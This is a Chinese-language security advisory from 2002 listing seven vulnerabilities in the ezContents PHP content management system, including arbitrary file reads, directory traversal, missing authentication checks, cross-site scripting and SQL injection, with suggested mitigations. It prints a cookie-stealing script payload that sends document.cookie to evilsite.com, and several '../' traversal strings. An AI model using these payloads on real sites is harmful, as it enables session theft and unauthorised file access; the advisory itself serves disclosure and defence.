首页 -> 安全研究

安全研究

安全漏洞
VisualShapers ezContents存在多个漏洞

发布日期:2002-07-25
更新日期:2002-08-01

受影响系统:
VisualShapers ezContents 1.41
VisualShapers ezContents 1.40
描述:
BUGTRAQ  ID: 5315

VisualShapers ezContents是一款基于PHP和MYSQL的WEB站点内容管理系统。

VisualShapers ezContents存在多个漏洞,远程攻击者可以利用这些漏洞获得系统文件信息、系统信息和更改数据库信息等操作。

VisualShapers ezContents存在如下多个漏洞:

1)ezContent没有正确检查图象文件是否实际已经上传或者文件信息是否通过POST执行,问题主要存在与图象文件上载函数没有正确检查上载文件的4个全局变量(file、file_name、file_size和file_type)是否真正设置,或者是否是正常的POST数据,攻击者可以通过指定WEB服务器上的文件如/etc/passwd作为上载文件,读取系统中任意文件内容。

2)维护图象Images:Add New:Create功能,可以在exContent目录中建立子目录,但是对用户提交的请求缺少正确过滤,攻击者可以使用"../../../../../../../tmp/hellothere"的目录名在exContent目录外建立目录。

3)管理脚本createdir.php、removedir.php和uploadfile.php没有检查用户是否登录,攻击者无需用户名和密码就可以通过POST请求进行建立/删除目录和上载文件操作。

4)维护图象文件列表功能存在问题,攻击者可以使用类似"../../../../../usr/bin"的文件列表请求查看ezContents外的任意目录。

5)如果登录失败VerifyLogin()会重定向WEB浏览器,但是没有停止程序的执行,这表示脚本仍旧继续运行着,不过用户没有直接看到,攻击者利用这个问题可以无需用户名通过简单的POST数据到正确的脚本编辑和查看很多信息。

6)ezContents在diary和其他地方没有很好的检查用户提交的输入,攻击者可以提交包含恶意Javascript脚本的数据,当其他用户浏览时可导致脚本代码在用户浏览器上执行,导致用户基于认证的COOKIE信息泄露等,如:

<script>self.location.href="http://evilsite.com/evil?"+escape(document.cookie)</script>

7)ezContents对用户输入缺少正确检查,存在多个SQL插入问题,通过使用恶意SQL命令可更改SQL查询,而导致数据库信息泄露或者更改。

<*来源:Ulf Harnhammar (ulfh@update.uu.se
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0292.html
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用PHP的is_uploaded_file()可防止第一个漏洞。

* 使用htmlspecialchars()可防止HTML插入漏洞

厂商补丁:

VisualShapers
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.visualshapers.com/

浏览次数:2660
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障